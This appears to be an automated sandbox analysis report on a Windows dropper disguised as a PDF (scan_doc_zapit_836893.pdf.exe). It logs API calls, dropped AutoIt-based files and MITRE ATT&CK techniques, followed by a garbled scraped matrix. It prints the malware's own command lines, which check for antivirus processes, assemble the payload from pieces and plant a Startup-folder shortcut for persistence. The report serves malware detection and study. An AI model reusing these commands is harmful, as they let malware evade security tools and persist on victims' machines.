Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: scan_doc_zapit_836893.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AA8B75 push ecx; ret 11_2_00AA8B88
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00728B75 push ecx; ret 17_2_00728B88
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0071CBDB push eax; retf 17_2_0071CBF8
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0071CC06 push eax; retf 17_2_0071CBF8

Persistence and Installation Behavior

barindex
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifFile created: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\185027\Spy.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifFile created: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\185027\Spy.pifJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.urlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.urlJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifFile deleted: c:\users\user\desktop\scan_doc_zapit_836893.pdf.exeJump to behavior
Source: Possible double extension: pdf.exeStatic PE information: scan_doc_zapit_836893.pdf.exe
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00B059B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_00B059B3
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00A95EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00A95EDA
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_007859B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,17_2_007859B3
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00715EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,17_2_00715EDA
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AA33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00AA33B7
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifAPI coverage: 5.1 %
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrAPI coverage: 4.7 %
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr TID: 5580Thread sleep count: 65 > 30Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AE4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00AE4005
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AE494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00AE494A
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AE3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00AE3CE2
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AEC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00AEC2FF
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00AECD9F
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AECD14 FindFirstFileW,FindClose,11_2_00AECD14
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AEF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00AEF5D8
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AEF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00AEF735
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AEFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00AEFA36
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00764005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00764005
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0076494A GetFileAttributesW,FindFirstFileW,FindClose,17_2_0076494A
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0076C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0076C2FF
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0076CD14 FindFirstFileW,FindClose,17_2_0076CD14
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0076CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,17_2_0076CD9F
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0076F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0076F5D8
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0076F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0076F735
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0076FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0076FA36
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00763CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00763CE2
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00A95D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00A95D13
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\185027\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\185027Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: NanoCipher.scr, 00000011.00000002.3351187223.0000000001A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3677
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AF45D5 BlockInput,11_2_00AF45D5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00A95240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00A95240
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AB5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00AB5CAC
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AD88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00AD88CD
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AAA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00AAA385
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AAA354 SetUnhandledExceptionFilter,11_2_00AAA354
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0072A354 SetUnhandledExceptionFilter,17_2_0072A354
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0072A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0072A385
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AD9369 LogonUserW,11_2_00AD9369
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00A95240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00A95240
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AE1AC6 SendInput,keybd_event,11_2_00AE1AC6
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AE51E2 mouse_event,11_2_00AE51E2
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "venezuelalandscapesmeantposters" Tournaments Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint HJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif HJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr" "C:\Users\user\AppData\Local\NanoSec Cryptographics\o"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & echo url="c:\users\user\appdata\local\nanosec cryptographics\nanocipher.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & exit
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & echo url="c:\users\user\appdata\local\nanosec cryptographics\nanocipher.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & exitJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AD88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00AD88CD
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AE4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00AE4F1C
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000290D000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000000.2143063108.0000000000B36000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Spy.pif, NanoCipher.scrBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AA885B cpuid 11_2_00AA885B
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AC0030 GetLocalTime,__swprintf,11_2_00AC0030
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AC0722 GetUserNameW,11_2_00AC0722
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AB416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_00AB416A
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: NanoCipher.scrBinary or memory string: WIN_81
Source: NanoCipher.scrBinary or memory string: WIN_XP
Source: NanoCipher.scrBinary or memory string: WIN_XPe
Source: NanoCipher.scrBinary or memory string: WIN_VISTA
Source: NanoCipher.scrBinary or memory string: WIN_7
Source: NanoCipher.scrBinary or memory string: WIN_8
Source: NanoCipher.scr.11.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AF696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_00AF696E
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AF6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00AF6E32
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0077696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,17_2_0077696E
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00776E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,17_2_00776E32
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information11
Scripting
2
Valid Accounts
1
Windows Management Instrumentation
11
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol21
Input Capture
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter
2
Valid Accounts
2
Valid Accounts
12
Obfuscated Files or Information
Security Account Manager3
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
DLL Side-Loading
NTDS17
System Information Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
1
File Deletion
LSA Secrets31
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder
211
Masquerading
Cached Domain Credentials1
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
Valid Accounts
DCSync4
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Virtualization/Sandbox Evasion
Proc Filesystem1
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
Access Token Manipulation
/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
Process Injection
